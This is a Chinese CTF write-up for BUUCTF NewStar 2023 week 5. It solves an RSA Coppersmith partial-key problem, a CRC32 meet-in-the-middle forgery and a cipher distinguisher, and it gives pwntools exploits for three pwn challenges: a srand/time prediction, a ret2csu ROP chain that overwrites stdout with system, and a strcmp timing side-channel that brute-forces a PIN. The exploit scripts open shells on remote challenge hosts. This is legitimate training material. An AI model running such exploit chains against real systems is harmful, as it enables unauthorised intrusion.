[BUUCTF NewStar 2023] week5 Crypto/pwn

最后一周几个有难度的题

Crypto

last_signin

也是个板子题，不过有些人存的板子没到，所以感觉有难度，毕竟这板子也不是咱自己能写出来的。

给了部分p, p是1024位给了922-101位差两头。

from Crypto.Util.number import *
flag = b'?'
 
e = 65537
p, q = getPrime(1024), getPrime(1024)
N = p * q
gift = p&(2**923-2**101)
m = bytes_to_long(flag)
c = pow(m, e, N)
 
print("N = ",N)
print("gift = ",gift)
print("c = ",c)
 
 
N =  12055968471523053394851394038007091122809367392467691213651520944038861796011063965460456285088011754895260428814358599592032865236006733879843493164411907032292051539754520574395252298997379020268868972160297893871261713263196092380416876697472160104980015554834798949155917292189278888914003846758687215559958506116359394743135211950575060201887025032694825084104792059271584351889134811543088404952977137809673880602946974798597506721906751835019855063462460686036567578835477249909061675845157443679947730585880392110482301750827802213877643649659069945187353987713717145709188790427572582689339643628659515017749
p0 =  70561167908564543355630347620333350122607189772353278860674786406663564556557177660954135010748189302104288155939269204559421198595262277064601483770331017282701354382190472661583444774920297367889959312517009682740631673940840597651219956142053575328811350770919852725338374144
c =  2475592349689790551418951263467994503430959303317734266333382586608208775837696436139830443942890900333873206031844146782184712381952753718848109663188245101226538043101790881285270927795075893680615586053680077455901334861085349972222680322067952811365366282026756737185263105621695146050695385626656638309577087933457566501579308954739543321367741463532413790712419879733217017821099916866490928476372772542254929459218259301608413811969763001504245717637231198848196348656878611788843380115493744125520080930068318479606464623896240289381601711908759450672519228864487153103141218567551083147171385920693325876018

直接用双值copper这个双值和多值还是有些区别的，应该是作了些优化。

def bivariate(pol, XX, YY, kk=4):
    N = pol.parent().characteristic()
 
    f = pol.change_ring(ZZ)
    PR, (x, y) = f.parent().objgens()
 
    idx = [(k - i, i) for k in range(kk + 1) for i in range(k + 1)]
    monomials = list(map(lambda t: PR(x ** t[0] * y ** t[1]), idx))
    # collect the shift-polynomials
    g = []
    for h, i in idx:
        if h == 0:
            g.append(y ** h * x ** i * N)
        else:
            g.append(y ** (h - 1) * x ** i * f)
 
    # construct lattice basis
    M = Matrix(ZZ, len(g))
    for row in range(M.nrows()):
        for col in range(M.ncols()):
            h, i = idx[col]
            M[row, col] = g[row][h, i] * XX ** h * YY ** i
 
    # LLL
    B = M.LLL()
 
    PX = PolynomialRing(ZZ, 'xs')
    xs = PX.gen()
    PY = PolynomialRing(ZZ, 'ys')
    ys = PY.gen()
 
    # Transform LLL-reduced vectors to polynomials
    H = [(i, PR(0)) for i in range(B.nrows())]
    H = dict(H)
    for i in range(B.nrows()):
        for j in range(B.ncols()):
            H[i] += PR((monomials[j] * B[i, j]) / monomials[j](XX, YY))
 
    # Find the root
    poly1 = H[0].resultant(H[1], y).subs(x=xs)
    poly2 = H[0].resultant(H[2], y).subs(x=xs)
    poly = gcd(poly1, poly2)
    x_root = poly.roots()[0][0]
 
    poly1 = H[0].resultant(H[1], x).subs(y=ys)
    poly2 = H[0].resultant(H[2], x).subs(y=ys)
    poly = gcd(poly1, poly2)
    y_root = poly.roots()[0][0]
 
    return x_root, y_root
 
R.=Zmod(N)[]
f = x*2^922 + p0 + y
x,y = bivariate(f,2^102,2^101)
p = int(f(x,y))
q = N//p
 
bytes.fromhex(hex(pow(c, inverse_mod(65537,(p-1)*(q-1)),N))[2:])
#flag{although_11ts_norma11_tis_still_stay_dsadsa}

School of CRC32

这个题有9个人完成，我估计有一半以上是非预期的。

题目很短，随机取个值得到crc32然后要求给出20位的串，要求crc32值相等。

import secrets
from secret import flag
import zlib
 
ROUND = 100
 
LENGTH = 20
 
print('Extreme hard CRC32 challenge')
print('ARE YOU READY')
 
for i in range(ROUND):
    print('ROUND', i, '!'*int(i/75 + 1))
 
    target = secrets.randbits(32)
 
    print('Here is my CRC32 value: ', hex(target))
 
    dat = input('Show me some data > ')
    raw = bytes.fromhex(dat)
    
    if zlib.crc32(raw) == target and len(raw) == LENGTH:
        print("GREAT")
    else:
        print("OH NO")
        exit()
 
print("Congratulation! Here is your flag")
print(flag)

作misc题经常用到爆破crc32这东西并不难，难点在于这东西要100次，因为最快的hashcat 也要半小时以上，我的机子很慢，爆破1个要5分钟以上，所以这条路不通了。

搜crc32的算法，有移位、多项式和类LCG。发现这个LCG方法应该可以逆向（很少见到逆向python库函数的题，这题也算是非常新颖了）。

crc32的生成方法是用尾字节与字符异或查crc32_table然后与原crc的前3字节异或，逐个字符这样加密下去。

def crc32(binaries):
    crc = 0xFFFFFFFF
    index = 0
    while index < len(binaries):
        crc = crc32_table[(crc & 0xFF) ^ binaries[index]] ^ (crc//256)
        index = index + 1
    return crc ^ 0xFFFFFFFF

所以爆破方法是中间相遇攻击。先正向生成16个0和2个字符的字典，然后逆向将给写的crc32值向前推这个规模是256*256也不算大，当查到字典里有时就得到了值。这样1秒就能完成一两轮。

from pwn import *
import os 
from zlib import crc32 
 
crc32_table =[
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA,
0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC,
0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940,
0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116,
0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A,
0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818,
0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C,
0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086,
0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4,
0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE,
0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252,
0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60,
0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04,
0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A,
0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E,
0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0,
0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6,
0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D]
 
 
#向前爆破两字节
def get_rcrc1(cin):  #cin是经过去0xFFFFFFF的
    res = {}
    for crc_tail in range(256): #last 8 bit 
        for i,v in enumerate(crc32_table):
            h = cin^v
            if h>= 0x1000000: continue 
            h <<=8  #高24位
            j = crc_tail^i #对应的字符
            #print(chr(j))
            res[h+crc_tail] = bytes([j])
    return res 
 
#向后爆破两字节存字典
res_f = {}
for i in range(256):
  for j in range(256):
      res_f[crc32(b'0'*16+bytes([i,j]))^0xffffffff] = bytes([i,j])
 
def get_rcrc2(cin):
    cin = cin^0xffffffff
    res = get_rcrc1(cin) #向前1字节
    for k in res:
        res2 = get_rcrc1(k)
        for v in res2:
            if v in res_f:
                #found 
                ret = res_f[v]+res2[v]+res[k]
                return ret                 
 
#a = get_rcrc2(3984772369)
#print(b'0'*16+a)
 
p = remote('node4.buuoj.cn', 28267)
context.log_level = 'debug'
 
for i in range(100):
    p.recvuntil(b'Here is my CRC32 value: ')
    hash = int(p.recvline(),16)
    a = get_rcrc2(hash)
    p.sendlineafter(b'Show me some data > ', (b'0'*16+a).hex().encode())
    print('recv:', p.recvline())
 
print('recv:', p.recvline())
print('recv:', p.recvline())
 
p.interactive()

PseudoHell

一个easy,一个hard这两个是一个题，前一段时间打一个国外比赛正好就是这道题。关完全相同。5关设置的次数有变化，原来0x100多，现在改成46。原文见前几天的一篇 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/133161392

原来第5关的打法是作256次把每个结果异或到一起，因为对于256的空间不相同肯定是0-255，所以异或到一起一定是0，而算法2给出的会有重值，也就得不到0。由于这里次数改少了，所以作法也作一丁点改变，就是看结果里有没有重值，有重值就是算法2。不过由于次数少，会有不成功的情况发生。50%还是有保证的。

from pwn import *
 
p = remote('node4.buuoj.cn', 25480)
#context.log_level = 'debug'
 
def p_query(msg, reverse=b'n'):
    p.sendlineafter(b"? > ", msg)
    p.sendlineafter(b"inverse? > ", reverse)
    return p.recvline().strip()
 
#1 使用1次
p.sendlineafter(b"How many times are required to roll for solving 1? > ", b'1')
for _ in range(33):
    res = p_query(b'0'*32, b'n')
    if b'0'*16 == res[:16]:
        p.sendlineafter(b"coin? > ", b'0')
    else:
        p.sendlineafter(b"coin? > ", b'1')
 
#2
p.sendlineafter(b"? > ", b'2')
for _ in range(33):
    res1 = p_query(b'0'*32, b'n')
    res2 = p_query(b'1'+b'0'*31, b'n')
 
    if res1[2:16] == res2[2:16]:
        p.sendlineafter(b"coin? > ", b'0')
    else:
        p.sendlineafter(b"coin? > ", b'1')
 
print(p.recvline())
#(Only for a junior division) Good job! flag_baby = WACON2023{8c3deab3b7a89f9bc7941a201}
 
#3
p.sendlineafter(b"? > ", b'2')
for _ in range(33):
    res1 = p_query(b'0'*32, b'n')
    res2 = p_query(b'0'*32, b'y')
    if res1[16:32] == res2[:16]:
        p.sendlineafter(b"coin? > ", b'0')
    else:
        p.sendlineafter(b"coin? > ", b'1')
 
 
print(p.recvline())
#Good job! flag_easy = WACon2023{930db8b4dedb8cb86f309521011a1039}
 
 
#4
p.sendlineafter(b"? > ", b'2')
for _ in range(33):
    res1 = p_query(b'0'*32, b'n')
    res1 = p_query(res1+b'0'*16, b'y')
    
    if res1 == b'0'*16:
        p.sendlineafter(b"coin? > ", b'0')
    else:
        p.sendlineafter(b"coin? > ", b'1')
 
context.log_level = 'debug'
 
#5
p.sendlineafter(b"? > ", b'48')
for _ in range(33):
    v = set()
    for i in range(48):
        t = bytes.fromhex(p_query(bytes([i]).hex().encode(),b'n').decode())[0]
        v.add(t)
    if len(v) == 48:
        p.sendlineafter(b"coin? > ", b'0')
    else:
        p.sendlineafter(b"coin? > ", b'1')
 
print(p.recvline())
#(Only for general/global divisions) Good job! flag_hard = WACon2023{c7a47ff1646698d275602dce1355645684f743f1}
p.interactive()

PWN

planet

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  unsigned int v4; // eax
  char s1[88]; // [rsp+20h] [rbp-60h] BYREF
  unsigned __int64 v6; // [rsp+78h] [rbp-8h]
 
  v6 = __readfsqword(0x28u);
  alarm(0x78u);
  printf("Passwd: ");
  fflush(stdout);
  gets((__int64)s1);
  if ( !strcmp(s1, "secret_passwd_anti_bad_guys") )
  {
    v4 = time(0LL);
    srand(v4);
    vuln1();
    vuln2();
  }
  return 0LL;
}

第1步要输入口令，但已经给了，第2步要rand值，这个可以直接用cyptes调用time(0)同步得到，然后就给shell了。不像第5周的水平

from pwn import *
from ctypes import *
 
clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
#windows msvcrt.dll
 
context.log_level = 'debug'
 
#p = process('./planet')
p = remote('node4.buuoj.cn', 28146)
#gdb.attach(p, "b*0x555555555832\nc")
p.sendlineafter(b"Passwd: ", "secret_passwd_anti_bad_guys\x00")
 
clibc.srand(clibc.time(0))
for i in range(11):
    print(bytes([clibc.rand()%26 +97 for _ in range(5)]))
password = bytes([clibc.rand()%26 +97 for _ in range(30)])
 
p.sendlineafter(b"What is your next move? (Help)\n>", b'Admin\x00')
p.sendlineafter(b"Insert the secret passwd\n> ", password+b'\x00')
p.sendlineafter(b"The command to exec\n> ", b'/bin/sh\x00')
 
p.interactive()

no_ouput

这个好像也是原题，连名字都像，不过还是有点差别，模板里的地址还是不一样的。

调用一个read以后就结束了。给了a一个read地址，意思是让修改这个位置。原来模板没给，直接改的stdout，这里给了a似乎是为了减小难度。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[112]; // [rsp+0h] [rbp-70h] BYREF
 
  init();
  read(0, buf, 0x200uLL);
  a = (__int64)&read;
  return 0;
}

高版本要调用这个错位形成的gadget ,通过ppp5+mov call+add 实现修改一个地址值的目的。

这里可以把a或者stdout的值（存的都是libc地址）修改为system

from pwn import *
 
elf = ELF('./no_ouput')
libc = ELF('./libc-2.31.so')
 
context(arch='amd64', log_level='debug')
 
ret = 0x00401254
add_dword_rbp_0x3d_ebx_ret = 0x0040112c  # 0: 01 5d c3  add    DWORD PTR [rbp-0x3d], ebx
 
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x0040124a  #__libc_csu_init
mov_call = 0x00401227
 
bss = elf.bss(0)  #stdout 给了a是read的地址,但是按模板直接打stdout也没问题
buf = elf.bss(0x40)
 
def ret2csu(rdi=0, rsi=0, rdx=0, rbp=0xdeadbeef, addr=bss):
    return flat([
        pop_rbx_rbp_r12_r13_r14_r15_ret,
        0, 1, rdi, rsi, rdx, addr, mov_call,
        0, 0, rbp, 0, 0, 0, 0,
    ])
 
def add(off, addr=bss):
    return flat([
        pop_rbx_rbp_r12_r13_r14_r15_ret,
        off, addr + 0x3d, 0, 0, 0, 0,
        add_dword_rbp_0x3d_ebx_ret,
    ])
 
payload = b'a' * 0x78 + flat([
    ret,
    add(0x6e69622f, buf),                                         #0x404080 /bin/sh\0
    add(0x0068732f, buf + 4),
    add(libc.sym['system'] - libc.sym['_IO_2_1_stdout_'], bss),   #0x404040 修改stdout为system
    ret2csu(rdi=buf, addr=bss)
])
 
 
#p = process('./no_ouput')
p = remote('node4.buuoj.cn', 25279)
#gdb.attach(p, "b*0x4011a7\nc")
 
p.send(payload)
 
p.sendline(b'cat /flag')
 
p.interactive()

 login

侧信道攻击，一直没用过，用的都是自己写shellcode的情况，当成功时进行死循环，不成功时退出，这样来判断字符是否正确。

这里有两个菜单一个是改密码要求输入6个数字的pin，另外一个是输入密码登录。显然这里是猜不出密码的，需要从6个数字爆破。

strcmp在比较字符里如果第1个不正确就直接返回，如果正确就比较下一个，所以这里会有个时间差，也就是总用时会有些区别，当运行10次或更多时就会看到不同的数字哪个正确。

一直试着不成功，最后在夜深人静的时候终于试成了。这题不好，因为网络因素会有非常大的影响导致不成功。毕竟那点时间差太小了。

from pwn import *
import time 
 
context.log_level = 'error'
 
p = remote('node4.buuoj.cn', 25937)
 
#
def get_bin(head):
  mx = 0 
  mv = ''
  for i in '0123456789':
    password = (head+i).ljust(6)
    totaltime = 0.0
    for _ in range(10):
        p.sendlineafter(b'>', b'3')
        p.recvuntil(b'Input code:')
        totaltime -= time.time()
        p.sendline(password.encode())
        v = p.recv(5)
        totaltime += time.time()
        if b'Wrong' not in v:
            print(password)
            p.sendline(b'123456')
            p.sendline(b'2')
            p.sendline(b'123456')
            p.sendline(b'cat flag')
            p.interactive()
            break
    #print(' ',i,totaltime)
    if totaltime> mx:
        mx = totaltime 
        mv = i 
        #print(mv,mx)
  return mv
 
head = ''
for i in range(6):
    head += get_bin(head)
    print(head)
 
 
'''
┌──(kali㉿kali)-[~/ctf/1028]
└─$ py login2.py
5
55
552
5520
55208
552086
 new password:Welcome to very-safe system
1.Register
2.Login
3.Forget password
>Detected system has only one user:admin. Logged as 'admin'
Input password:Log in successful!!!flag{9d85e15c-7268-4710-9e39-bcc21a6ac151}
$  
'''